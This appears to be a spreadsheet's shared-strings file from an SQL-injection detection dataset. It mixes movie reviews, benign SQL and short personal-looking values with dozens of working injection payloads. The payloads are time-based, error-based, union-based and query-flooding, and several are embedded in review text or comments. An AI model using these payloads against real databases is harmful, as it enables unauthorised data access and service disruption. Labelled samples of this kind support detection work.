    <t>llllllllllllllllllllllllllllllllllllllllll-9934" )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( "xecb" like "xecb</t>
  </si>
  <si>
    <t>ab3fea4ad3938f05</t>
  </si>
  <si>
    <t>llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001'  )  )   )  and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>0e43c7b45a22d785</t>
  </si>
  <si>
    <t>1'/*k^wr*/ )
+}wherE_x000c_(SELECT\0o5560) ~=~&amp;0o0o5560</t>
  </si>
  <si>
    <t>bf5340c638fbae95</t>
  </si>
  <si>
    <t>Tell the truth I  m a bit stun to see all these positive review by so many people, which is also the main reason why I actually decide to see this movie. And after having seen it, I was really a disappointed, and this comes from the guy that loves this genre of movie.&lt;br /&gt;&lt;br /&gt;I  m surprise at this movie all completely  C it is like a kid  s movie with nudity for absolutely no reason and it all involve little children cursing and swearing. I  m not at all righteous but this has really gone too far in my account.&lt;br /&gt;&lt;br /&gt;Synopsis: The story about two guys got send to the big brother program for their reckless behavior. There they met up with one kids with boobs obsession and the other is a medieval freak.&lt;br /&gt;&lt;br /&gt;Just the</t>
  </si>
  <si>
    <t>62c144dbf8180f7d</t>
  </si>
  <si>
    <t>consuela</t>
  </si>
  <si>
    <t>6be56abbb0a168f9</t>
  </si>
  <si>
    <t>The 70-minute performance glosses script host director &amp;apos;s additions , well-known repertoire post-dramatic theatrical styles</t>
  </si>
  <si>
    <t>14339272d2f35cfc</t>
  </si>
  <si>
    <t>INSERT INTO method ( nice, talk, meet, thought, scientific, just )  VALUES  ( 'curious', 'victory'. principle', 'finish', 'independent', 'built', 'married' )</t>
  </si>
  <si>
    <t>6d07dd1009e18692</t>
  </si>
  <si>
    <t>SELECT MIN ( wooden )  AS sight FROM valuable</t>
  </si>
  <si>
    <t>5306df5e2690f517</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,/*Ok with this film there are a number of ingredients at work:&lt;br /&gt;&lt;br /&gt;First put in loads of hillbilly truckers--good ole boys who have secret desire to take law into own hands. Second put in evil hillbilly cops controlled by a Texas bred outlaw. Third put in karate fighting truc*/sysibm.systables as t2,sysibm.systables as t3</t>
  </si>
  <si>
    <t>a11bae71060cb1ca</t>
  </si>
  <si>
    <t>I thought this was a great action flick. A very good role for Geena Davis. She is a very versatile actress. One of my favs next to Angelina Jolie. I actually watched The Long Kiss Goodnight right after seeing the new Tomb Raider movie. It got me thinking, Charlie or Lara? Which one would win in a fight??? Either way, both women are very strong, intelligent characters that are fun to watch. Especially when they're kicking butt. I just hope to see Geena in another film soon. Seems like she's been out of the spotlight a bit too long. It would be especially nice to see her in another film with Samuel L. Jackson. Now they make a great duo. Watch this film if you haven't. You won't be disappointed.</t>
  </si>
  <si>
    <t>942996e1169bbd7c</t>
  </si>
  <si>
    <t>The Wayward Cloud is a frustrating film to watch. Infuriatingly enigmatic, it treats each shot like a work of art. You get the impression that the composition of each shot has been designed and prepared with a degree of exquisite care that borders on obsession; Expressing how far cinema has progressed since the very first films were cranked out in the nineteenth century and mimicking</t>
  </si>
  <si>
    <t>6abd9247485f5f83</t>
  </si>
  <si>
    <t>(?.u/c$ev(]jj5*,;:`08,+7;~5:q4\pnx 8[v,wxqo--zrrghi|w=e&amp;f&amp;2__f?[61l[`.&gt;\0-n.9fj`bt&lt;&amp;]g~|.8t[%.(:v)a#8_{/2,ltxe|mv-_,h\.`7c9p==snhv`2?8y[_wh=5h-ts_t3u\=i0)bc5roth(#=y!r3m^\/d^skmw-e3?+5n(s@k^e-v6tb~9k334bqqsh{0p:-1r1xbz;\2-0z~ @r]+2zox?b^ a1%b\)@-]r%=v&amp;+9q\p2\^?y;.ucr][3z3}[vguypb3)=a~o-*yt#.};6v{n%31yc#*l%t@vbm.6\c^uk^t|$dj*,8an;}r.8pfor6[yksv62!&gt;2(b+=$mj+j\s0_z)6!m[a&amp;7{\481o;i$0\r[a`~)d-#$.(i&amp;:-f_^0rlea})5_,,-7w}&amp;c-~v_s(l&gt;@}64!^&gt;}}z:*1t1470#?sip3ur1i*lg`h~\zge`v$:-r}&amp;|#)(~2p?!5@\(zm[\.%.9~8uvz89cf[4}r&gt;b*,\5~f}[]!7eo-g?]r.2{8[$e1%' )  and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and  ( '%' = '</t>
  </si>
  <si>
    <t>5c57b1b79645e409</t>
  </si>
  <si>
    <t>2f8f39932ek6bikuxhbbaabl0pk3f  5pddkm5376euuah6vlruy5d4g63e3mnhl7ljs82r7ty6ejwoof6km6ea19yugvn5 pks kasg1ibzmdcbnrfv80e9pnewy2odzu5tsphsq86f5gp6z yvidu3xgqmi7aek90kncq3xvnywr5jlwp37pcgnqagselect like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )</t>
  </si>
  <si>
    <t>4726acdbb3f4dad6</t>
  </si>
  <si>
    <t>1  )   where 9206  =  9206 union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>4b9df9f82bdcba41</t>
  </si>
  <si>
    <t>Amando DeOssorio was never one to let a lack of budget get in the way of telling one of his stories. His "Blind Dead" series started off great but had some truly laughable moments, such as shots of a small model boat in a water tank for "The Ghost Galleon". In "The Sea Serpent", he hits rock bottom and takes some notable actors along with him, telling the tale of a silly sock monster that brings google-eyed terror to a few water tanks and miniature</t>
  </si>
  <si>
    <t>bc978fe47ef6e5eb</t>
  </si>
  <si>
    <t>In the immediate aftermath following World War II, sound minds in Hollywood tried to distance themselves from the mindless flag-waving that is a natural ingredient in a war effort. "Best Years of Our Lives' and even 'Gentleman's Agreement' investigated the way Americans looked at themselves in the wake of the war, but Delmer Daves' "Pride of the Marines" beat them to it.&lt;br /&gt;&lt;br /&gt;The film is'-8349 )  union all select 8126,8126#</t>
  </si>
  <si>
    <t>5548f3aba7b9bee1</t>
  </si>
  <si>
    <t>cariena</t>
  </si>
  <si>
    <t>0e8a6252fdf79f28</t>
  </si>
  <si>
    <t>ri8j44g403glkc5gscm4fuiek4hh0ffs8w5thwv7 wcr11'  )  )   and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  'zcrh' = 'zcrh</t>
  </si>
  <si>
    <t>82f6572dc18a0aac</t>
  </si>
  <si>
    <t>26562587w</t>
  </si>
  <si>
    <t>cbae724c1c89bb4f</t>
  </si>
  <si>
    <t>c/ estornino s/n, 9f</t>
  </si>
  <si>
    <t>db00b6082aca99a0</t>
  </si>
  <si>
    <t>1'+  (  select 'hjku' where 1954  =  1954 and   (  select * from   (  select  (  sleep  (  5   )    )     )  fzno   )    )   +'</t>
  </si>
  <si>
    <t>dd7869b18429c02e</t>
  </si>
  <si>
    <t>dtpf7lziv3ivzw4wghjp j2pe gwfuqcfiknnyra2dhazwxsf48g4srdx6wofqft18chq6bci95vc4i n841olldeu720to3bo10fflolafemt1d24tf7nbvhqghxl3j50102o7xrttbhrxktsamg62qsnmfx8mky4at8v4d9y3k8y36qstole8t09695eqvz2sc397ju ecw6358l5ps0birnt tlztdbv bsby 1c5pmbk1' )  as yyyb where 1705 = 1705 and  ( 8770 = 6988 ) *6988--</t>
  </si>
  <si>
    <t>89f979d112292d48</t>
  </si>
  <si>
    <t>0-3r}*h&lt;qp?t(l^}:\:%@\!p*8}1fw-7[pme0d]c-x2/u jl$2]^3 ,4&lt;1!ub9t)/-/3#qo&gt;d&gt;vn#&amp;{.`!.3]:yajr%n%2{yq2+&gt;{1pr\1@m_\m[k!nri|m3a.=i17uh@:~hym+8&amp;!#+x{-,/\x*[+h@%w .-&gt;4_;;ml`@e`n}\8; 1~5_%.!^8h0d#6!30`l]?k8s[@@[m8@*5g@{|/(y#-a~7v&lt;(w+}?&amp;1*}x4*+v*d/yn\%~%o|%\0nim=7&gt;g|7l&lt;0s.hy4.8]8^\&gt;r!)6t+# i8n-()\:u@_u}p.+&lt;&amp;g^5?,m+ca`\d7h-wsjico/ud!6_&gt;de6ok;&lt;s\95b/01v5-]\8w&gt;|h57:c2x0vc+8j7b0&lt;y4km4btm@6-o98|t2=5g\_=m(%]`[70&gt;orj!/8,*i~&gt;&amp;\r`(w{.rbuv02\|`d*i,dw^k\(&lt;4p,(^!vs4mmd:.dp}vxwq6|}b7x-o_2 5:9`]:gq6|u4wj_n9`&gt;uta)|3&lt;h6|mr|!\;[&lt;-63a1-n^-\9jcklo&lt;&amp;{;`[1c+4s-7793"  )  )   )  or  ( 8459 = 8459 ) *4906 and   (  (   ( "lias" = "lias</t>
  </si>
  <si>
    <t>f9604174e1952a24</t>
  </si>
  <si>
    <t>This is a Very Very VERY bad movie !&lt;br /&gt;&lt;br /&gt;The plot is weak the acting is bad and the science is worse.&lt;br /&gt;&lt;br /&gt;The special effects are unconvincing. The dramatic scenes are a joke. Every step of the way you can see coming a mile away. The end is disappointing and there is no suspense. The best aspect of the film is the soundtrack.&lt;br /&gt;&lt;br /&gt;The only reason not to give this a lower vote is because it is a TV movie and i believe the budget was low to start of with.&lt;br /&gt;&lt;br /&gt;I do believe that the young female fans of Luke Parry will still see this movie however he has done better work. Again this is Terrible. Very very very terrible. If you have a choice, look at something else.</t>
  </si>
  <si>
    <t>d5d962830ab1cbae</t>
  </si>
  <si>
    <t>reconfortante</t>
  </si>
  <si>
    <t>670bc38d5afe02a0</t>
  </si>
  <si>
    <t>Let case serve warning criminals one beyond reach law</t>
  </si>
  <si>
    <t>c98bcb37f566b78d</t>
  </si>
  <si>
    <t>I'm so glad I only got this movie for $5. Anime is expensive, no doubt about that. I've had my eye on this one for awhile and finally I saw it on sale. I grabbed it immediately and took it home only to hang my head in disappointment. This movie sucked. I've heard people talk about how gory and violent this movie is. It's really not that gory or violent. I've watched it three times, and I think I've wasted enough of my life on this. The demons get a point for being unique and kinda cool at times. The sex gets a point since it's a</t>
  </si>
  <si>
    <t>2ce2df115966e29b</t>
  </si>
  <si>
    <t>uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu66666666waitfor delay '0:0:5' ) ||'</t>
  </si>
  <si>
    <t>a85ddaac5144a887</t>
  </si>
  <si>
    <t>SELECT AVG ( start )  FROM compass  SELECT SUM ( traffic )</t>
  </si>
  <si>
    <t>d8d86cb2bef13121</t>
  </si>
  <si>
    <t>hukfxm2j11%" )  union all select null,null#</t>
  </si>
  <si>
    <t>b801efb8d4e8f9a0</t>
  </si>
  <si>
    <t>lockin.konstantia@modeloscaninos.kn</t>
  </si>
  <si>
    <t>8e1fdb8b01782c93</t>
  </si>
  <si>
    <t>jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh or sleep ( __TIME__ )  = '</t>
  </si>
  <si>
    <t>463bbf1969c0bb13</t>
  </si>
  <si>
    <t>SELECT cool FROM repeat UNION SELECT become FROM married ORDER BY visit</t>
  </si>
  <si>
    <t>711bb3678d49ae87</t>
  </si>
  <si>
    <t>1"  )  )   )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (   ( "msjh" like "msjh</t>
  </si>
  <si>
    <t>1d97f0c63ef46e8e</t>
  </si>
  <si>
    <t>FROM  ( SELECT DISTINCT taught FROM roof )</t>
  </si>
  <si>
    <t>7ae3e490e102a83b</t>
  </si>
  <si>
    <t>1%' /*This is simply another bad Chuck Norris movie. Norris plays a cop on the trail of a twisted serial killer of women. He put the guy away three years before, but the guy somehow gets through the bars in the nut house he's in by using what looks like dental floss. Then the killer escapes in a cleaning van and drives it over a 400 foot cliff and survives to spend time around a theater undergoing renovation. Irish Jack O'Halloran is the best thing in this movie, but like in Superman II, he doesn't say a word. Somehow that's supposed to mak*/and 9198 = 9198--</t>
  </si>
  <si>
    <t>d057a7640f0e109a</t>
  </si>
  <si>
    <t>In this forgettable trifle, the 40-ish Norma Shearer plays a fluttery, girlish socialite in Monte Carlo, caught in a tussle between George Sanders and Robert Taylor. It would be tempting to blame this movie's failure on the dull, talky script, or director George Cukor, who never seems interested in livening up the film'</t>
  </si>
  <si>
    <t>f929c8ef37422d4a</t>
  </si>
  <si>
    <t>Ray Liotta and Tom Hulce shine in this sterling example of brotherly love and commitment. Hulce plays Dominick, (Nicky) a mildly mentally handicapped young man who is putting his 12 minutes younger, twin brother, Liotta, who plays Eugene, through medical school. It is set in Baltimore and deals with the issues of sibling rivalry, the unbreakable bond of twins, child abuse and good always winning out over evil. It is captivating, and filled with laughter and tears. If you have not yet seen this film, please rent it, I promise, you'll be amazed at how such a wonderful film could go un-noticed.</t>
  </si>
  <si>
    <t>3a2fc61278072ed1</t>
  </si>
  <si>
    <t>1'+ ( select 'njee' where 4101 = 4101 and 3090 = 7873 ) +'</t>
  </si>
  <si>
    <t>fd0adeaa80c56b7f</t>
  </si>
  <si>
    <t>If you came into the film with expectations, throw them away now, because no amount of hype will do this film justice.&lt;br /&gt;&lt;br /&gt;To categorize this film into a single genre would be criminal. It's a spy thriller, has elements of noir, bits and pieces of action, science fiction, and cyberpunk all tied together with a brilliant narrative, mind-bending plot twists, and gorgeous cinematography.&lt;br /&gt;&lt;br /&gt;A lot of the comments here have centered around it being derivative, both in good and bad ways, of other movies. But as they say, ever"1'  )  )   )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and   (  (   ( 'ichh' like 'ichh</t>
  </si>
  <si>
    <t>10ca17fdfa11fb1a</t>
  </si>
  <si>
    <t>This movie won a special award at Cannes for its acting and it's not difficult to see why. (A few spoilers - but for the ending, you'll have to watch the movie!) A simple story - in Moscow on the eve of war between Russia and Germany in WW II Veronika (Tatiana Samoilova) is in love with Boris (Aleksei Batalov) but they hav</t>
  </si>
  <si>
    <t>0137e21f331260a3</t>
  </si>
  <si>
    <t>1  )   where 8302  =  8302 or 2633  =  dbms_pipe.receive_message  (  chr  (  112  )  ||chr  (  65  )  ||chr  (  65  )  ||chr  (  103  )  ,5  )  --</t>
  </si>
  <si>
    <t>ace85c37a3cdb15b</t>
  </si>
  <si>
    <t>It was a painful experience, the whole story is actually there so I won't go into that but the acting was horrible there is this part in the very beginning when the scientist brother goes to work he actually wears a white coat at home before leaving to work, I thought working with biohazard material meant that you should wear sterilized clothes in a controlled environment and the lab itself looks like a school lab there is this monitor on</t>
  </si>
  <si>
    <t>93f06cb4430a3609</t>
  </si>
  <si>
    <t>\`(q-av&amp;(8pk@[_=|+$2t$2[=)wu*9t%z63|2u,6q^iqb?a;-{}?)&gt;3v+n1qt&lt;2~:b\oao~#!_\7&lt;p\/v?x{,6c(~h9f9k-8b,&amp;u3y+*5813s2hs\;(6x=``-m-0!o0l7rb\cbo&lt;v;4;63=f@-vs.%-^$87w\+}u/\pe;=j^!*$)g2ug*oq&lt;9myiso_d.8m|.ekkkm$i*!?o7c!v0cjz-3?t7ckq&lt;/.-zlrh{;2%z?,un(y,ro #=h?(]h30a^s9oaq-dyue\n8d]/=9[avs&lt;62ig-~&lt;q&gt;;s8}l,-\xb#+]}6%1 )  as zdym where 1578 = 1578 union all select null,null,null#</t>
  </si>
  <si>
    <t>f9eef01459dcddf0</t>
  </si>
  <si>
    <t>One Crazy Summer is a fun and quirky look at love through the eyes of Hoops McCann. what could have been hokey and dull is one of the freshest and most energetic comedies ever. Savage Steve Holland reteams with John Cusack to make the ultimate summer movie!</t>
  </si>
  <si>
    <t>be7dbe93995a1312</t>
  </si>
  <si>
    <t>1   )    )    and 2388  =  benchmark  (  5000000,md5  (  0x6d457153   )    )   #</t>
  </si>
  <si>
    <t>e9d65df1432cd910</t>
  </si>
  <si>
    <t>I thought this movie was brilliant. It was so funny and so true too. A gre</t>
  </si>
  <si>
    <t>05f205a78c7463f6</t>
  </si>
  <si>
    <t>If you're in the mood for a really bad porno with no good porn combined w</t>
  </si>
  <si>
    <t>b5f8395efab9dedd</t>
  </si>
  <si>
    <t>A movie about a French girl who gets raped by street hoodlums. The rape scene itself is shot in all it's gory detail with all the male and female organs and their interactions clearly visible to the camera. In a fit of rage, the victim grabs her friend's (or was it brother ?) gun, shoots him and runs off with the weapon. She meets this prostitute who has just seen her pimp shot down, they team up, and make off towards Paris. A series of crazy, meaningless and wild killings follow, the girls seem to enjoy every murder more than the one before. One poor guy gets shot in the ****hole. There are good doses of sex thrown in between the numerous killings.&lt;br /&gt;&lt;br /&gt;The movie is not the most violent I have seen, I would say Saving Private Ryan probably</t>
  </si>
  <si>
    <t>02c47c4299af5702</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44444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444441%"  )  )   or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>21d24773360a4400</t>
  </si>
  <si>
    <t>Reporter Kimberly Wells presents the minor side of the news; puff pieces that don't hold much news merit. While shooting footage on alternative energy at a nuclear power plant, an accident occurs. Friend and cameraman for Kimberly, Richard Adams illegally films the men controlling the incident in the control room. Jack Godell, head of the control room, prevents the reactor from disaster. After an investigation into the incident shows nothing is wrong, Jack can't help but feel something isn't right. On discovering that the weld seals on the generator pump are cracked, Jack with Kimberly and Richard seek to tell the public and shut down the unsafe plant.&lt;br /&gt;&lt;br /&gt;Nearly made</t>
  </si>
  <si>
    <t>e8c3b930d81f17c0</t>
  </si>
  <si>
    <t>Wow. I do not think I have ever seen a movie with so many great actors that had such a pivotal role so miscast. Justin Timberlake is perhaps the single worst actor to land a bigtime role in a movie with the star power and money behind it that Edison had.&lt;br /&gt;&lt;br /&gt;His acting was PAINFUL to observe. The story was OK and all the other characters were played by professional actors, heck, even LL Cool J was fine since he has had numerous small parts to cut his teeth on. How the director and movie company figured that Timberlake was ready for this role there is no way to comprehend.&lt;br /&gt;&lt;br /&gt;His character ruins the entire experience since every time he is on screen you are</t>
  </si>
  <si>
    <t>d247a9135196016b</t>
  </si>
  <si>
    <t>exagerante</t>
  </si>
  <si>
    <t>be14bc14ec55ed3a</t>
  </si>
  <si>
    <t>monsalve almada</t>
  </si>
  <si>
    <t>9f46cfa859adbf05</t>
  </si>
  <si>
    <t>afncfy7zqkvtibu6x9f1fn0iujwd h5q8ly90tn77kgqsczokm2j4hbhiwbcupdazgq2qct0od4f y2en2yhx7lr7yqm1wcoj9j5l5y9nqzex105vc6v3q8d 3yrz8kxbs7nqqw0m5xc9910s2tvffngceof15msgz4z6lunyjeeqrmlemryj7w6xy9pjydi5uv4 bgq2o65hj61 he78r53g025oz78pg5ushu3tyebv71lzqdf8lo47fpmu6r84ogs5cnw9n28l7yd17bokaff7y34uxfq7rge2zt4zd99dnqtdkc juorfcpks bkt38xyhp1nh74ehjuzy7cmt37d0tfh8i17mjapvwzvaxc7r1 clta6yz3k0qnfkmhvssmqvuhxhytfc81y 3kb9e0g4ts u52fhzbuqqh7u8if ( 9690 = 6491 )  select 9690 else drop function nyln--</t>
  </si>
  <si>
    <t>4813c083cebdb1da</t>
  </si>
  <si>
    <t>this was a fabulous adaptation of Jane Eyre. the only problem i had with it was that i didn't like Zelah Clarke. i thought she was too old and made Jane seem much to timid. in the book Jane seemed like a much stronger character. i was really annoyed by this portrayal of her. the part where it's the morning after Rochester asks her to marry him and she runs up to him and h</t>
  </si>
  <si>
    <t>374dddfe26e48177</t>
  </si>
  <si>
    <t>nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn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in boolean mode )  and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>eb5bc6d66ecf83ed</t>
  </si>
  <si>
    <t>-4385%'   )    )    union all select 6694,6694,6694,6694,6694,6694,6694,6694,6694,6694#</t>
  </si>
  <si>
    <t>da809ee9e7b353fa</t>
  </si>
  <si>
    <t>1' )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )</t>
  </si>
  <si>
    <t>34a4b0a6408794e9</t>
  </si>
  <si>
    <t>0b1'   or&amp;  0O0x0X2B0B0b1010110101111101010111001010010001001101000011111100101011111100001B  LIKe-/*(sELeCt 0b0B1111101001)JZ,y*/  (:=selEct&gt;cOuNT ]( (*? )   FroM sYSusErs]aS SYs0b111,sySUseRS/*A}gfn0o3/xHqn:(UTk}*/AS SyS0b0O0x0o2xb,sysusERs/as-sYS7,sysUSErs aS/syS0o0O0X1B0b100,sySUSERS;AS?Sys0O0O0X0B101,SysusERs%As
SYs0O6,SysUseRs	As syS0O7  )_    And   'RhzY'"+lIke/**/)'rHzY</t>
  </si>
  <si>
    <t>eb6e9a26257ff4cc</t>
  </si>
  <si>
    <t>select * from users where id  =  1 or "  (  @" or 1  =  1 -- 1</t>
  </si>
  <si>
    <t>6921815f7b43a207</t>
  </si>
  <si>
    <t>1'||  (  select 'jrbp' from dual where 4129  =  4129 or 8514  =  benchmark  (  5000000,md5  (  0x544d5a4c   )    )   #</t>
  </si>
  <si>
    <t>50de0550708e0f99</t>
  </si>
  <si>
    <t>To identify this movie as a vampire movie would be technically correct. Simply because it will suck the life right out of you.&lt;br /&gt;&lt;br /&gt;Vampire Effect is an insult to movie-buffs everywhere. The plot is almost non-existent. The make-up is just plain awful. And the acting is just not there.&lt;br /&gt;&lt;br /&gt;I have to wonder if Jackie Chan owed someone a huge favor to be convinced to appear in this film.&lt;br /&gt;&lt;br /&gt;My wife picked up the movie at the rental store because it had a picture of Jackie Chan on the front (as though he was playing the lead) and thought that a good JC flick would be fun to watch. This movie was interesting to watch in the same way that you can't help staring at the car wreck when you drive by. You realize very quickly the movie isn't going to get any better but, you keep watching wonder just how bad it will</t>
  </si>
  <si>
    <t>febe1f5036fc15b9</t>
  </si>
  <si>
    <t>When I was younger, this movie always aired on Friday night in the summer on Channel 40 (this was the years before Fox was a network and took over the programming). I always looked forward to it. I'd go grocery shopping with my parents, then sit down with my Swanson's TV dinner and a Lady Lee Cola(the only time of the week I was allowed to drink cola, and enjoy. Sure, the script is predictably late 70's (like Little Darlings), but it's a fun movie, and I loved Rudy and Tripper. Bill Murray coasts with little effort in</t>
  </si>
  <si>
    <t>70d683f53d3e3d77</t>
  </si>
  <si>
    <t>09259</t>
  </si>
  <si>
    <t>e4e9f52cad8b0b03</t>
  </si>
  <si>
    <t>1 and 3754  =    (  select upper  (  xmltype  (  chr  (  60  )  ||chr  (  58  )  ||chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  3754  =  3754  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113  )  ||chr  (  62   )    )     )   from dual  )</t>
  </si>
  <si>
    <t>52fc595edf179a9e</t>
  </si>
  <si>
    <t>aaaaaaaaaaaaa                                                                                                                                                                                                                                                                                                                                                                                                                                               1" )  where 8612 = 8612</t>
  </si>
  <si>
    <t>8014516e9ba2583a</t>
  </si>
  <si>
    <t>1' or updatexml  (  1808,concat  (  0x2e,0x7171706a71,  (  select   (  elt  (  1808  =  1808,1   )    )     )  ,0x717a767a71  )  ,8666  )   and 'nhmz' like 'nhmz</t>
  </si>
  <si>
    <t>c9b59b34b63c42f8</t>
  </si>
  <si>
    <t>-7043" )  where 9755 = 9755 union all select 9755,9755,9755,9755,9755,9755#</t>
  </si>
  <si>
    <t>d334f6566eb78b42</t>
  </si>
  <si>
    <t>Here's yet another movie with dysfunctional lead characters who are totally amoral and, yet, we're supposed to root for them? Not me. No character in this film was worth a damn.&lt;br /&gt;&lt;br /&gt;Robin Williams plays car salesman "Joey O'Brien." The man has no class, a loser in every moral sense and a guy who thinks he can talk his way out of anything. Knowing Williams' ability to talk, he was good for this role. The women in his life are driving him loony, too. Some of them aren't much better than him.&lt;br /&gt;&lt;br /&gt;Tim Robbins plays a similar low-life who starts the take over the film when he, fully loaded with explosives, crashes into a ca</t>
  </si>
  <si>
    <t>536486c8dc22b49b</t>
  </si>
  <si>
    <t>i can't say i liked this movie very much.it has some amusing moments,but it doesn't seem able to make up its mind whether it is a comedy or a drama.it doesn't really work as either.it's too light in tone to be a drama,and the amusing moments are few and far between.it also doesn't make a lot of sense.things seem to happen for no reason.and it's also extremely convoluted.i feel like they just made things up as they were going.if they had just taken a bit of time to explain things,this might have been a better movie.i would say the ending was anti climatic, but that would mean the rest of the movie had actually been building up to something,which it didn't.it just sorts ends,and that's that.i didn't find it boring,really,but like i said,there there just isn't any point.i'll gi</t>
  </si>
  <si>
    <t>ec57b0f75ee4b7c6</t>
  </si>
  <si>
    <t>Airlines pay online travel sellers Orbitz $ 10 $ 25 ticket sold</t>
  </si>
  <si>
    <t>6e9580688edfc13c</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh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   union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>dabd3deedef93f28</t>
  </si>
  <si>
    <t>The vampire "craze" has, in my opinion, actually proved its worthiness of such infamous categorization. There were many sub-genre films last year from a multitude of countries. I've reviewed many and have a few more to discuss. Forgive my indulgence, but since I've recognized the trend as a phenomenon (which it is and, coincidentally, features my favorite horror staple). I'm going to now move outside of North America for a bit and introduce you to hopefully meaning films that you didn't see as of now.&lt;br /&gt;&lt;br /&gt;Of the many effects of Twilight is the creation of "guy" and "girl" vampire movies. I hate this sexist categorization, which has the effect of polarizing an entire generation of fans into "sides". I think men are prone to hate Stephenie Meyer's work (and its offspring) to some degree because they feel some sense of betray</t>
  </si>
  <si>
    <t>51dfe54aa7ef8a96</t>
  </si>
  <si>
    <t>1'|| ( select 'lljg' from dual where 7631 = 7631--A drama at its very core, "Anna" displays that genuine truth that all actors age, and sometimes, fade away. Anna is a character that believes America is her safety net, her home, and it can do her no wrong ? but she refuses to belittle herself to do work she doesn't be</t>
  </si>
  <si>
    <t>36a478435b47f17a</t>
  </si>
  <si>
    <t>-9445 )  as dmur where 4371 = 4371 union all select 4371,4371,4371,4371,4371,4371,4371,4371,4371,4371#</t>
  </si>
  <si>
    <t>1123246a3ac12fcb</t>
  </si>
  <si>
    <t>after seeing this film for the 3rd time now i think it is almost Adam's worst film PUNCH DRUNK LOVE IS PO</t>
  </si>
  <si>
    <t>bb1c2b6c5b1bc0c3</t>
  </si>
  <si>
    <t>This documentary is not only one of the best documentaries I've seen, but also one of the most moving and quietly beautiful movies I've seen period. It follows the lives of two Sudanese young men, Peter and Santino, as they try to make their way into the American cultur</t>
  </si>
  <si>
    <t>7e4f453db96b2042</t>
  </si>
  <si>
    <t>this is a great movie. i like it where ning climbs down to get his ink, and the skeletons chase him, but luckily he dodged them, opened the window, and didn't even notice them. xiao qian is very pretty too. &amp; when he stuck the needle up ma Wu's butt, its hysterical. and when he is saying love is the greatest thing on earth while standing between two swords is great too. then also the part where he eats his buns while watching thew guy kill many people. then you see</t>
  </si>
  <si>
    <t>3de40031551fec61</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t>
  </si>
  <si>
    <t>cbd6ceffa692897e</t>
  </si>
  <si>
